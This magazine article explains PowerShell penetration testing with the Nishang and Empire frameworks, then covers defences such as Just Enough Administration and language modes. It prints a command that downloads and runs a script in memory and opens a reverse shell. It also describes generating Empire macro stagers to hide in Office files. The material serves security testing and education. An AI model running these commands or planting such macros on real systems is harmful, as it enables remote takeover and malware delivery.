Security PowerShell as a Security Tool Lead image: Lead Image © Freya Sapphire, Photocase.com

Stressing security with PowerShell

Impenetrable

PowerShell is not the usual go-to tool for pentesting, but it can reveal IT vulnerabilities that suggest a more considered use of the tool. By Thomas Wiefel

Windows PowerShell is more than just a preferred tool for administrators – it's ideal for penetration testing. To check a system thoroughly for vulnerabilities, pentesters need to assume the role of the attacker. With the help of native scripts by Nishang and Empire, known security gaps can be tested, the authorization level escalated, system information obtained, or the system damaged by malware.

Windows PowerShell (WPS) has been the standard tool of many system administrators for several years, providing both imperative (command chains with system instructions) and declarative (defined objectives such as Desired State Configuration) features. The idea of associating this tool with "hacking" because of its everyday use seems a little strange. However, it is the comprehensive conceptual design of PowerShell that makes it interesting for penetration tests. In security, the framework is mainly used in three areas: post-exploitation, infrastructure scanning and information gathering, and attacks over the communication structure.

Procedure and Tools of Attackers

Post-exploitation essentially refers to the operational phases after a victim's system has been compromised by the attacker. The value of the compromised system is determined by the data stored on it and its potential use for malicious purposes. Post-exploitation focuses on the information from the hacked system, which is available for further use within complex structures, especially networks. In this phase, the attacker collects confidential data to analyze configuration settings, network interfaces, and other communication channels. The information is used to maintain permanent access to the system in line with the attacker's requirements. The system can be compromised by exploiting existing vulnerabilities in the remote configuration, by social engineering, or by leveraging exploits in applications.

For the second phase of infiltration, hybrid frameworks consist of non-system-specific tools like Python and generated PowerShell scripts. The setup often relies on a Linux host with a configured web server that acts as the center for attack control. Although the structure is heterogeneous, these frameworks will hereafter be called "PowerShell Frameworks," because the transferred payload comprises PowerShell code.

The other existing form of PowerShell exploit applications is native scripts. Known vulnerabilities are tested to escalate the authorization level, grab system information, and even damage the system with malware. Frameworks such as Nishang [1] and Empire [2] are available for these objectives.

Running Malicious Scripts with Nishang

Nishang is an open source framework for creating powerful PowerShell scripts. Unlike Empire, which follows the hybrid approach, Nishang is a PowerShell-only application at its core. Nishang scripts are classified as malicious and blocked by many antivirus programs. Bypassing the defenses of Windows Defender or virus scanners is in itself an attack technique that shows that PowerShell scripts can also bypass restrictions. Windows Defender prevents direct execution of Nishang PowerShell files.

A conceivable platform for executing test scripts is a sandbox system, where the scripts can be run as binary code. As tools, specialized meta-frameworks are available on GitHub, PowerLine [3] being just one example. PS2EXE [4] also follows a similar approach, although with completely different administrative goals. Another option for executing PowerShell code is based on a volatile process space, wherein scripts are placed in memory on the target system. By in-memory downloading and execution of the PowerShell script, the remote scripts can be imported into the local session as a statement list, which transfers functions and variables to the current context:

PowerShell invoke-Expression (New-Object Net.WebClient).DownloadString("http://$companyWebServer/Invoke-PowerShellTcp.ps1");
Invoke-PowerShellTcp -Reverse -IPAddress $ipAddress -Port $PortNumber

The scripts themselves are divided into categories:

Information gathering
Infrastructure and system scanning
Authorization escalation
WMI and WinRM remoting modifications
Malicious code generation

After cloning the repository into a local directory, subdirectories are available for the various objectives of a penetration test. Within the subdirectories are PowerShell applications with concrete tasks and, in the client section, scripts for creating Excel (XLS), HTML Application (HTA), or Compiled HTML Help (CHM) file types with integrated malware. The comprehensive approach makes Nishang a good introduction to penetration testing with PowerShell. With no complex requirements for the test lab, access is facilitated.

Pentesting with Empire

The Empire framework provides an example of how to use a dedicated server as a platform for the test suite. If Empire is not available on the distribution you are using, you can install it manually. First, you need to create a project directory (e.g., /opt/projects) before enabling version control and cloning the sources:

cd /opt/projects
git init
git clone https://github.com/EmpireProject/Empire.git

The newly created Empire directory contains the Setup subdirectory. For the installation, you need to run setup.sh from this directory. Confirm the prompts shown by the routine by answering affirmatively. When you are done, you can launch the framework by typing sudo ./empire; exit closes the Empire console.

Before running any tests, it is worth taking a look at the structure of the framework:

A listener is a process that waits for an incoming connection from the machine. Empire uses this process to transfer specific payloads.
An agent is a persistent process that maintains a connection between the control center and the compromised host.
A stager is a snippet that allows malicious code to be executed by the agent on the compromised host.
A module encapsulates test-specific functions.

An integrated help feature, which you can call up in Empire with the help command, gives you a hand in managing the many modules. The listeners command takes you to the listeners management menu. Within the submenu, help is context-driven and refers to the listeners. Other useful commands in this submenu are shown in Table 1.

Tabelle 1: Listeners Subcommands

Command	Action
`list`	Shows active listeners.
`uselistener`	Starts new listener module.
`usestager`	Initializes the stager.
`agents`	Switches to the agents menu.
`back` or `main`	Leads to the main menu.
`exit`	Leaves Empire.
`help`	Displays the help menu.
`info`	Provides information about the active listener.
`kill`	Ends a listener process.

Empire lets you create client-based tests with Office applications and hide framework-generated macros in unobtrusive Office files, as with Nishang. Creating the malicious code is easy from the Empire console window. The first step is to switch to the listener menu. You can complete the uselistener command with the Tab key, as shown in Figure 1. An existing listener, to which you can bind a new stager, must be active. Now create the macro with:

The uselistener http command lets you create a new listener from predefined modules. — Figure 1: The `uselistener http` command lets you create a new listener from predefined modules.

usestager multi/macro http

After executing the info command, you will see the settings of the macro you just created. The execute command saves the snippet with the default settings in /tmp/macro. The script macro is displayed with cat /tmp/macro. Now you can copy the macro and hide it in an office file with the macro recorder.

Modules are the core of Empire. Analysis of functionality from the Empire console and the help menu opens a multitude of test possibilities against IT systems. This complexity makes the use of Empire worthwhile despite the costly creation of a test lab. Besides this use of PowerShell offensively, many approaches can minimize risks, including techniques for restricting the set of available PowerShell cmdlets and command containers (modules), for removing vulnerabilities in remote management, and ultimately, for restricting PowerShell from accessing .NET, Component Object Model (COM), and Windows Management Instrumentation (WMI) classes. (See also the "Just Enough Administration" box.)

Just Enough Administration

Administrative user accounts for managing computers and Active Directory items are often inflexible. Permissions are not tight enough and too far-reaching. Hijacking an account with administrative privileges poses a security risk. Entire server environments can be attacked.

Administrative permissions extend across entire domains. One problem is the lack of options for linking permissions with activities. The number of available roles is usually far fewer than the number of administrative tasks actually performed. This difference results in a discrepancy between assigned and required permissions. As a result, users often receive more rights than they actually need for their work.

Just Enough Administration (JEA) counters this with a granular role system. Membership in an administrative group is no longer required to carry out certain activities. PowerShell grants rights for specific role-based functions. The rights are valid during a PowerShell session and allow the execution of certain PowerShell commands.

JEA can be configured to allow non-administrators to execute commands that require administrative privileges. On the other hand, it is possible to grant users with administrative privileges minimum rights for certain tasks. In this way, you can precisely control what actions a user can perform on a computer. Settings are made through session definitions. The goal is to reduce the number of cmdlets and modules used.

Securing Remote Maintenance

Starting in PowerShell version 3, remote maintenance is supported by the Windows Remote Management (WinRM) service and the Web Services Management (WSMAN) protocol. WSMAN was designed as a secure and reliable method for managing computers based on Simple Object Access Protocol (SOAP) and HTTP. Both session-controlled 1:1 management by get-Command -noun PsSession and 1:N administration with the Invoke command are possible. Remote admins can start, view, terminate, and delete terminal sessions.

Additionally, alternative methods such as the Distributed Component Object Model (DCOM) relying on WMI calls or remote procedure calls (RPCs) also exist in PowerShell. PowerShell remoting by WinRM does not rely on an API call; rather, it communicates with a remote peer. The executed commands are sent to the remote shell and executed there, and the results are returned. An administrator uses PowerShell remoting to connect to server A. The existing session should then connect to server B, passing in the existing credentials. However, this approach fails, and access to the resource on server C is denied, because the credentials that were used to create the remote PowerShell session are not passed from server B to server C.

As a workaround, PowerShell offers Credential Security Support Provider (CredSSP) as an authentication method. However, when using CredSSP, PowerShell performs a network logon in plain text instead of an encrypted connection. Therefore, when using CredSSP, the password is first sent as a text message to server A, and the user can then authenticate against server B.

PowerShell Limitations

Windows PowerShell is a .NET application that belongs to the System.Management.Automation class type in the .NET framework. Interoperability with the .NET framework puts WPS on par with the most powerful scripting languages, ranking up there with high-level languages like C#. Windows PowerShell has automatic and self-defined variables, as well as host environment variables, that can be used to control PowerShell's behavior. The $ExecutionContext variable is particularly relevant for security; it contains a list of sub-objects with configuration options. Settings regarding class access can be implemented by the SessionState.LanguageMode object, where:

FullLanguage = no limitation.
RestrictedLanguage = no property reference, no method call, no object initialization, no change of host settings possible.
NoLanguage = static methods of a class are not executed, only referencing of core types.
ConstrainedLanguage = (see NoLanguage).

Conclusions

Deeply anchored in the system and with access to system APIs, PowerShell can play the devil's advocate, assuming the role of the bad guys and scanning for IT vulnerabilities. The knowledge of offensive possibilities can lead to a more considered use of Windows PowerShell. Here, Just Enough Administration especially seeks to replace rigid group-based management with the roles that admins actually need.